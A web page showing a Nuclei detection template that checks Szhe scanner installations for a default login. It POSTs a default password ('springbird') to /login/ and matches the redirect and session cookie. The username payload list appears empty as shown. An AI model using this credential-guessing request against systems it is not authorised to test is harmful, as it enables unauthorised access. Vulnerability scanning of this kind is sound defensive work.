Skip to content

Szhe Default Login

ID: szhe-default-login

Severity: medium

Author: pikpikcu

Tags: szhe,default-login

Szhe default login information was discovered.

id: szhe-default-login
info:
name: Szhe Default Login
author: pikpikcu
severity: medium
description: Szhe default login information was discovered.
reference:
- https://github.com/Cl0udG0d/SZhe_Scan
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cwe-id: CWE-522
metadata:
max-request: 1
tags: szhe,default-login
http:
- raw:
- |
POST /login/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
email={{username}}&password={{password}}&remeber=true
payloads:
username:
password:
- springbird
attack: pitchfork
matchers-condition: and
matchers:
- type: word
words:
- 'You should be redirected automatically to target URL: <a href="/">/</a>'
- type: word
words:
- 'Set-Cookie: session'
part: header
- type: status
status:
- 302
# digest: 4a0a0047304502201add38bccf1ac0fa729381116206986603cf9fedf973311c3009e341ba42da900221009c227ed7604384e83d1747964cf2e3308856fa59dd133fe1b172ad6003d73c4f:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/szhe/szhe-default-login.yaml"

View on Github